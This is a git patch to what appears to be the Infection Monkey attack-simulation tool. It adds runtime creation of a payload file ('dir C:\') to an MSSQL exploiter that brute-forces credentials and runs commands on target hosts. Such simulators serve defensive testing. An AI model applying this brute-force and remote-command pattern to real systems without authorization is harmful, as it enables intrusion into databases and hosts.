From dfe6cf073ed241d4ea07358fe79029a3544f962d Mon Sep 17 00:00:00 2001 From: "maor.rayzin" Date: Sun, 20 Jan 2019 15:13:48 +0200 Subject: [PATCH] - Added dynamic file creation on runtime instead of a static payload file --- monkey/infection_monkey/exploit/mssqlexec.py | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 5c3c92600..1ffbd973e 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -22,6 +22,21 @@ class MSSQLExploiter(HostExploiter): self._config = __import__('config').WormConfiguration self.attacks_list = [mssqlexec_utils.CmdShellAttack] + @staticmethod + def create_payload_file(payload_path=DEFAULT_PAYLOAD_PATH): + """ + This function creates dynamically the payload file to be transported and ran on the exploited machine. + :param payload_path: A path to the create the payload file in + :return: True if the payload file was created and false otherwise. + """ + try: + with open(payload_path, 'w+') as payload_file: + payload_file.write('dir C:\\') + return True + except Exception as e: + LOG.error("Payload file couldn't be created", exec_info=True) + return False + def exploit_host(self): """ Main function of the mssql brute force @@ -29,6 +44,9 @@ class MSSQLExploiter(HostExploiter): True or False depends on process success """ username_passwords_pairs_list = self._config.get_exploit_user_password_pairs() + + if not MSSQLExploiter.create_payload_file(): + return False if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list, self.DEFAULT_PAYLOAD_PATH): LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))